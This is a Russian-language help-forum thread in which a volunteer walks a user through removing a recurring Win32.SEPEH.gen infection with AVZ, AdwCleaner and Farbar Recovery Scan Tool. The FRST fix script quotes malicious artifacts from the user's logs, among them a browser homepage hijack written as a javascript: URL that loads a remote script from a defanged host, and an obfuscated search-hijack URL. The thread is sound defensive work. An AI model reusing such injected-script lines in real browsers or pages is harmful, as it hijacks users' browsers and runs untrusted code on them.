Александр Алексеев 0 Опубликовано 26 февраля, 2019 Share Опубликовано 26 февраля, 2019 Добрый день помогите удалить вирус Win32.SEPEH.gen. Антивирус обнаруживает его , вроде бы удаляет. Но после перезагрузки снова обнаруживает его. Лог файл прикрепляю. CollectionLog-2019.02.26-13.20.zip Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 253 Опубликовано 26 февраля, 2019 Share Опубликовано 26 февраля, 2019 (изменено) Здравствуйте! Следы бывшей установки Avast очистите по соотв. инструкции: Чистка системы после некорректного удаления антивируса. Через Панель управления - Удаление программ - удалите нежелательное ПО: IObit Unlocker Закройте все программы, временно выгрузите антивирус, файерволл и прочее защитное ПО. Выполните скрипт в AVZ (Файл - Выполнить скрипт): begin ExecuteRepair(1); ExecuteRepair(13); RebootWindows(false); end. Компьютер перезагрузится. Файл CheckBrowserLnk.log из папки ...\AutoLogger\CheckBrowserLnkперетащите на утилиту ClearLNK. Отчёт о работе в виде файла ClearLNK-<Дата>.log прикрепите к вашему следующему сообщению. Затем: Скачайте AdwCleaner (by Malwarebytes) и сохраните его на Рабочем столе. Запустите его (необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования. Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[sxx].txt (где x - любая цифра). Прикрепите отчет к своему следующему сообщению. Подробнее читайте в этом руководстве. Изменено 26 февраля, 2019 пользователем Sandor Цитата Ссылка на сообщение Поделиться на другие сайты
Александр Алексеев 0 Опубликовано 26 февраля, 2019 Автор Share Опубликовано 26 февраля, 2019 Спасибо за оперативную помощь. Всё выполнил по пунктам. После сканирования AdwCleaner. Кнопку Очистить и востановить не нажимал. AdwCleanerS00.txt ClearLNK-2019.02.26_14.39.45.log Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 253 Опубликовано 26 февраля, 2019 Share Опубликовано 26 февраля, 2019 Запустите повторно AdwCleaner (by Malwarebytes) (программу необходимо запускать через правую кн. мыши от имени администратора). В меню Настройки включите дополнительно в разделе Базовые действия: Сбросить политики IE Сбросить политики Chrome В меню Панель управления нажмите Сканировать. По окончании нажмите кнопку Очистить и восстановить и дождитесь окончания удаления. Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt (где x - любая цифра). Прикрепите отчет к своему следующему сообщению Внимание: Для успешного удаления нужна перезагрузка компьютера!!!. Подробнее читайте в этом руководстве. Цитата Ссылка на сообщение Поделиться на другие сайты
Александр Алексеев 0 Опубликовано 26 февраля, 2019 Автор Share Опубликовано 26 февраля, 2019 (изменено) Ваши рекомендации выполнил. Троян всё ещё на месте. AdwCleanerC01.txt Изменено 26 февраля, 2019 пользователем Александр Алексеев Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 253 Опубликовано 26 февраля, 2019 Share Опубликовано 26 февраля, 2019 Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе. Когда программа запустится, нажмите Yes для соглашения с предупреждением. Нажмите кнопку Scan. После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению. Подробнее читайте в этом руководстве. Цитата Ссылка на сообщение Поделиться на другие сайты
Александр Алексеев 0 Опубликовано 26 февраля, 2019 Автор Share Опубликовано 26 февраля, 2019 Готово. Addition.txt FRST.txt Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 253 Опубликовано 26 февраля, 2019 Share Опубликовано 26 февраля, 2019 Отключите до перезагрузки антивирус. Выделите следующий код: Start:: CreateRestorePoint: GroupPolicy: Restriction - Chrome <==== ATTENTION GroupPolicy\User: Restriction ? <==== ATTENTION CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION HKU\S-1-5-21-3771345801-508105297-1196020027-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErU7DQvze26qMhqdUweztPcF995dNXwCYzl8raBKKxPmIFMuLP4vHBZntUYrYVll8r2uFS805MYWgEHGgSi17R8rgx-E95FrGiC0pBW1vkC7pKSmSGfK5w_04lOvLpR8j75v3lydtHietS72IuUPtxWBtAu-MX6Q7vlwd1lVGI&q={searchTerms} CHR HomePage: Default -> javascript:var%20s=document.createElement('script');s.src='hxxp://vkontaktemp3.ru/myscripts/audio.js?nc='+Math.random();document.body.appendChild(s);void(0); C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\honmgldinfkdoibjgmofiioodbclaomc C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfbnpafjoipohaijdlpkkpbflklecdpi C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\gfbnpafjoipohaijdlpkkpbflklecdpi C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\gfbnpafjoipohaijdlpkkpbflklecdpi C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\honmgldinfkdoibjgmofiioodbclaomc C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmeinlfojlcegblpogpjbhipmonclejh C:\Users\User\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\gfbnpafjoipohaijdlpkkpbflklecdpi C:\Users\User\AppData\Roaming\Opera Software\Opera Stable\Extensions\gfbnpafjoipohaijdlpkkpbflklecdpi R1 F86D6063F32A; C:\Windows\F86D6063F32A.sys [621928 2019-01-28] (韵羽健康管理咨询(上海)有限公司 -> VideoDriver) 2019-01-28 20:42 - 2019-01-28 20:42 - 000621928 _____ (VideoDriver) C:\Windows\F86D6063F32A.sys 2019-02-26 14:14 - 2018-03-28 19:45 - 000000000 ____D C:\ProgramData\IObit 2019-01-28 20:51 - 2019-01-28 20:51 - 000070896 _____ () C:\Users\User\AppData\Local\Config.xml 2019-01-28 20:42 - 2019-01-28 20:42 - 000140800 _____ () C:\Users\User\AppData\Local\installer.dat 2019-01-28 20:51 - 2019-01-28 20:51 - 000005568 _____ () C:\Users\User\AppData\Local\md.xml 2019-01-28 20:42 - 2019-01-28 20:50 - 000722944 _____ () C:\Users\User\AppData\Local\sham.db ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File Task: {930814F8-210D-4962-8159-343C7422D1F7} - System32\Tasks\Avast Software\Overseer => C:\Program Files\AVAST Software\Avast\setup\overseer.exe AlternateDataStreams: C:\Users\Public\DRM:مايكروسوفت [48] HKU\S-1-5-21-3771345801-508105297-1196020027-1000\Software\Classes\.scr: scrfile => <==== ATTENTION FirewallRules: [TCP Query User{16F242A4-372E-4C8A-9DBD-049BA9D4D233}C:\users\user\desktop\propack\utorrent.exe] => (Allow) C:\users\user\desktop\propack\utorrent.exe No File FirewallRules: [UDP Query User{793CE41C-5C1C-4607-ABF7-4341CFC9D05D}C:\users\user\desktop\propack\utorrent.exe] => (Allow) C:\users\user\desktop\propack\utorrent.exe No File FirewallRules: [{A7E1AAFC-FBA3-481F-916D-F648B18E6DCE}] => (Allow) C:\Program Files\NetWorx\networx.exe No File FirewallRules: [{614E2EC8-28B2-4B9F-8464-624E449157A3}] => (Allow) C:\Program Files\NetWorx\networx.exe No File EmptyTemp: Reboot: End:: Скопируйте выделенный текст (правой кнопкой - Копировать). Запустите FRST (FRST64) от имени администратора. Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению. Компьютер будет перезагружен автоматически. Подробнее читайте в этом руководстве. Цитата Ссылка на сообщение Поделиться на другие сайты
Александр Алексеев 0 Опубликовано 26 февраля, 2019 Автор Share Опубликовано 26 февраля, 2019 Следующий этап выполнен. Fixlog.txt Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 253 Опубликовано 26 февраля, 2019 Share Опубликовано 26 февраля, 2019 Что сейчас с проблемой? Цитата Ссылка на сообщение Поделиться на другие сайты
Александр Алексеев 0 Опубликовано 26 февраля, 2019 Автор Share Опубликовано 26 февраля, 2019 Вроде,пока не проявляется. Попробую просканировать компьютер заново. Я скорее всего завтра отпишусь, мне на работу нужно уходить скоро. Спасибо за оперативную и квалифицированную помощь)) Цитата Ссылка на сообщение Поделиться на другие сайты
Александр Алексеев 0 Опубликовано 27 февраля, 2019 Автор Share Опубликовано 27 февраля, 2019 Проблема решена. Полное сканирование проблем не выявило. Ещё раз спасибо. Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 253 Опубликовано 27 февраля, 2019 Share Опубликовано 27 февраля, 2019 Завершающие шаги: 1. Пожалуйста, запустите adwcleaner.exe В меню Настройки - Удалить AdwCleaner - выберите Удалить. Подтвердите удаление, нажав кнопку: Да. Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите. Компьютер перезагрузится. Остальные утилиты лечения и папки можно просто удалить. 2. Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10) Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt Прикрепите этот файл к своему следующему сообщению. Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.